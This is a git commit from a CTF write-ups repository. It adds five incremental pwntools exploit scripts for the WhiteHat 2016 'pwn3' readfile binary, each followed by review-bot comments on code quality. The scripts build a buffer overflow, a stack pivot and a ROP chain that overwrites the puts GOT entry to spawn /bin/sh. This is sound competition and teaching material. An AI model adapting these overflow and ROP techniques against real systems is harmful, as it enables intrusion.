
Commit 1ee9b8a

committed
Merge branch 'master' of github.com:ctfhacker/ctf-writeups
2 parents fe71bab + 0af3b8e commit 1ee9b8a

7 files changed

+274
-0
lines changed


whitehat-2016/pwn3/libc-2.19.so

1.67 MB
Binary file not shown.

whitehat-2016/pwn3/readfile

7.62 KB
Binary file not shown.

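--- a/whitehat-2016/pwn3/win_1.py
+++ b/whitehat-2016/pwn3/win_1.py
@@ -0,0 +1,36 @@
+from pwn import *
+import string
+
+context.terminal = ['tmux', 'splitw', '-h']
+
+r = None
+
+def write_file(name, data):
+    r.sendline('1')
+    r.sendline(name)
+    r.sendline(str(len(data)))
+    r.sendline(data)
+
+def read_file(name):
+    r.sendline('2')
+    r.sendline(name)
+
+filename = '/tmp/' + cyclic(240, alphabet=string.ascii_uppercase)
+print(filename)
+try:
+    os.remove(filename)
+except:
+    pass
+
+r = process("./readfile")
+
+data = cyclic(1000)
+write_file(filename, data)
+
+r = process("./readfile")
+gdb.attach(r, '''
+c
+''')
+read_file(filename)
+
+r.interactive()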
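Review bot: The bare `except:` around `os.remove(filename)` (file lines 20–23) swallows every exception, not just a missing file, so a stale `/tmp` file that cannot be removed (for example one owned by another user on a shared box) goes unnoticed and the second `readfile` run silently reads old data; narrow it to `except OSError: pass`. The first `process("./readfile")` handle is dropped without `r.close()` when `r` is rebound on line 30, leaving the writer child running for the rest of the script. `os` is not imported explicitly and appears to rely on `from pwn import *` re-exporting it; an explicit `import os` would make the script self-contained.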

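--- a/whitehat-2016/pwn3/win_2.py
+++ b/whitehat-2016/pwn3/win_2.py
@@ -0,0 +1,38 @@
+from pwn import *
+import string
+
+# context.terminal = ['tmux', 'splitw', '-h']
+
+r = None
+
+def write_file(name, data):
+    r.sendline('1')
+    r.sendline(name)
+    r.sendline(str(len(data)))
+    r.sendline(data)
+
+def read_file(name):
+    r.sendline('2')
+    r.sendline(name)
+
+filename = '/tmp/' + cyclic(240, alphabet=string.ascii_uppercase)
+print(filename)
+try:
+    os.remove(filename)
+except:
+    pass
+
+r = process("./readfile")
+
+data = 'a' * cyclic_find('paac')
+data += p32(0x804a0a0)
+data += 'b' * (1000 - len(data))
+write_file(filename, data)
+
+r = process("./readfile")
+gdb.attach(r, '''
+c
+''')
+read_file(filename)
+
+r.interactive()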
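Review bot: `data += p32(0x804a0a0)` on file line 28 is an unexplained magic constant; the reader cannot tell what stack slot `cyclic_find('paac')` lands on or why this particular address is chosen. The sibling script win_3.py in this same commit labels the identical value `# 1) Some valid address to pass fclose`, and that comment belongs here as well, ideally with a note that the `'paac'` offset comes from the crash produced by win_1.py. The `write_file` helper also sends `data` with `sendline`, so any payload containing `\n` would be cut short by the target's line read; a comment stating that the payload must stay newline-free would save the next reader a debugging session.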

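--- a/whitehat-2016/pwn3/win_3.py
+++ b/whitehat-2016/pwn3/win_3.py
@@ -0,0 +1,42 @@
+from pwn import *
+import string
+
+# context.terminal = ['tmux', 'splitw', '-h']
+
+r = None
+
+def write_file(name, data):
+    r.sendline('1')
+    r.sendline(name)
+    r.sendline(str(len(data)))
+    r.sendline(data)
+
+def read_file(name):
+    r.sendline('2')
+    r.sendline(name)
+
+data = cyclic(cyclic_find('ARAA', alphabet=string.ascii_uppercase))
+data += p32(0x804af00) # 2) Some valid address to pass fclose
+data += cyclic(240-len(data), alphabet=string.ascii_uppercase)
+filename = '/tmp/' + data
+print(filename)
+try:
+    os.remove(filename)
+except:
+    pass
+
+r = process("./readfile")
+
+data = 'a' * cyclic_find('paac')
+data += p32(0x804a0a0) # 1) Some valid address to pass fclose
+data += 'b' * (1000 - len(data))
+write_file(filename, data)
+
+r = process("./readfile")
+gdb.attach(r, '''
+break *0x0804890a
+c
+''')
+read_file(filename)
+
+r.interactive()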
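Review bot: `gdb.attach(r, ...)` on file lines 36–39 runs unconditionally, so the script cannot be run headless or pointed at a remote target without editing it; gating it on pwntools' command-line flags, `if args.GDB: gdb.attach(r, 'break *0x0804890a\nc')`, keeps the debugging path without making it mandatory. The breakpoint address `0x0804890a` is hard-coded with no comment saying which instruction it is; win_4.py in this commit mentions a `call [eax + 0x3c]` site, and if this is that instruction a comment to that effect (`# break at call [eax + 0x3c]`) would let a reader follow the chain without reopening the binary — confirm before writing it. Note also that `data` is built twice in this script for two different purposes (filename payload on lines 18–21, file contents on lines 30–32); distinct names such as `name_payload` and `file_payload` would remove the ambiguity.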

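--- a/whitehat-2016/pwn3/win_4.py
+++ b/whitehat-2016/pwn3/win_4.py
@@ -0,0 +1,56 @@
+from pwn import *
+import string
+
+# context.terminal = ['tmux', 'splitw', '-h']
+
+elf = ELF('readfile')
+rop = ROP(elf)
+stager = ROP(elf)
+
+r = None
+
+def write_file(name, data):
+    r.sendline('1')
+    r.sendline(name)
+    r.sendline(str(len(data)))
+    r.sendline(data)
+
+def read_file(name):
+    r.sendline('2')
+    r.sendline(name)
+
+leaveret = 0x80486f1
+
+data = p32(leaveret)
+
+data2 = 'c' * cyclic_find('aaca')
+data2 += p32(0x04a0f000)
+data2 += '\x08' * (cyclic_find('ARAA', alphabet=string.ascii_uppercase) - 4 - len(data2))
+data += data2
+
+data += p32(0x804af00) # 2) Some valid address to pass fclose
+data += p32(0x804a0a5-0x3c) # 3) Address we will be calling at instruction call [eax + 0x3c]
+data += cyclic(240-len(data), alphabet=string.ascii_uppercase)
+filename = '/tmp/' + data
+print(filename)
+try:
+    os.remove(filename)
+except:
+    pass
+
+r = process("./readfile")
+
+data = 'a' * cyclic_find('paac')
+data += p32(0x804a0a0) # 1) Some valid address to pass fclose
+data += 'b' * (1000 - len(data))
+write_file(filename, data)
+
+r = process("./readfile")
+gdb.attach(r, '''
+break *{}
+break *0x0804890a
+c
+'''.format(hex(leaveret)))
+read_file(filename)
+
+r.interactive()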
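Review bot: `p32(0x04a0f000)` on file line 27 places a 0x00 byte inside `filename`, so `os.remove(filename)` on line 37 raises on the embedded NUL (TypeError on Python 2, ValueError on 3) and the bare `except:` on line 38 hides that entirely — the cleanup never runs. The target presumably treats the name as a C string and truncates at that NUL, in which case the file actually written is `filename.split('\x00')[0]` and that is the path the cleanup should remove; at minimum catch `OSError` only so the NUL error surfaces. Separately, `elf`, `rop` and `stager` on lines 6–8 are constructed but never used in this script, so `ELF('readfile')` is dead work here; either drop them or comment that they are scaffolding for the next stage.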

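--- a/whitehat-2016/pwn3/win_5.py
+++ b/whitehat-2016/pwn3/win_5.py
@@ -0,0 +1,102 @@
+from pwn import *
+import string
+
+context.terminal = ['tmux', 'splitw', '-h']
+
+elf = ELF('readfile')
+rop = ROP(elf)
+stager = ROP(elf)
+
+r = None
+
+def write_file(name, data):
+    r.sendline('1')
+    r.sendline(name)
+    r.sendline(str(len(data)))
+    r.sendline(data)
+
+def read_file(name):
+    r.sendline('2')
+    r.sendline(name)
+
+"""
+1:
+0x080486af : mov eax, dword ptr [0x804a088] ; cmp eax, ebx ; jb 0x80486ba ; mov byte ptr [0x804a084], 1 ; add esp, 4 ; pop ebx ; pop ebp ; ret
+2:
+0x080486be : add dword ptr [ebx + 0x5d5b04c4], eax ; ret
+"""
+
+ret = 0x08048a29
+binsh = 0x804af00
+
+stager.gets(0x804a300) # Arbitrary address somewhere deeper in the 0x804a000 chunk
+stager.migrate(0x804a300) # Stack pivot to 0x804a300
+print(stager.dump())
+
+rop.gets(0x804a088) # Put constant value
+rop.raw(0x80486af)
+rop.raw(0xaaaaaaaa) # junk
+rop.raw(elf.got['puts']-0x5d5b04c4) # puts-magic libc
+rop.raw(0x804a900) # junk
+rop.raw(0x80486be) # Add constant to puts
+rop.gets(binsh) # Put /bin/sh in memory
+rop.gets(0x804a088) # Put pointer to /bin/sh in memory
+rop.raw(0x80486af) # Put pointer to /bin/sh in eax
+rop.raw(0x804a900) # junk
+rop.raw(0x804a900) # junk ebx
+rop.raw(0x804a900) # junk ebp
+rop.puts(0) # Trigger magic libc
+
+leaveret = 0x80486f1
+
+data = p32(leaveret)
+
+data2 = 'c' * cyclic_find('aaca')
+data2 += p32(0x04a18000)
+data2 += '\x08' * (cyclic_find('ARAA', alphabet=string.ascii_uppercase) - 4 - len(data2))
+data += data2
+
+data += p32(0x804af00) # 2) Some valid address to pass fclose
+data += p32(0x804a0a5-0x3c) # 3) Address we will be calling at instruction call [eax + 0x3c]
+data += p32(0xcafebabe) # junk data
+# data += str(stager) # TRIGGER FOR ROP CHAIN
+# data += p32(ret) * ((240-len(data)-len(str(stager)))/4) # ROP nops
+data += p32(0xdeadbeef) * 36
+data += str(stager)
+
+filename = '/tmp/' + data
+print(filename)
+try:
+    os.remove(filename)
+except:
+    pass
+
+r = process("./readfile")
+
+data = 'a' * cyclic_find('paac')
+data += p32(0x804a0a0) # 1) Some valid address to pass fclose
+data += 'b' * (1000 - len(data))
+write_file(filename, data)
+
+r = process("./readfile")
+"""
+gdb.attach(r, '''
+break *{}
+break *0x0804890a
+break gets
+break *0x80486be
+c
+'''.format(hex(leaveret)))
+"""
+read_file(filename)
+
+raw_input("Send second rop chain")
+r.sendline(str(rop)) # Constant value to add to puts
+raw_input("Send constant value")
+r.sendline(p32(0xfffdaa19)) # Constant value to add to puts
+raw_input("Send /bin/sh")
+r.sendline("/bin/sh\0") # Constant value to add to puts
+raw_input("Send pointer to /bin/sh")
+r.sendline(p32(binsh)) # Constant value to add to puts
+
+r.interactive()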
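Review bot: The comment `# Constant value to add to puts` is copy-pasted onto all four `sendline` calls on file lines 94–100, but only line 96 sends that constant; lines 94, 98 and 100 send the second ROP chain, the `/bin/sh` string and its pointer, as the adjacent `raw_input` prompts already say — fix the three wrong comments or drop them. `0xfffdaa19` itself is an undocumented delta tied to one libc build; since `libc-2.19.so` ships in this commit, computing it as symbol arithmetic on `ELF('libc-2.19.so')` with a comment naming the target symbol would make the chain reproducible and explain the 32-bit wraparound the `add` gadget relies on. `rop.raw(elf.got['puts']-0x5d5b04c4)` on line 39 hands a negative integer to the chain; writing it as `rop.raw((elf.got['puts'] - 0x5d5b04c4) & 0xffffffff)` makes the intended modular arithmetic explicit rather than depending on how `ROP` packs negative values. The cleanup on lines 69–72 has the same embedded-NUL problem as win_4.py (`p32(0x04a18000)` starts with 0x00, so `os.remove` raises and the bare `except:` hides it).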
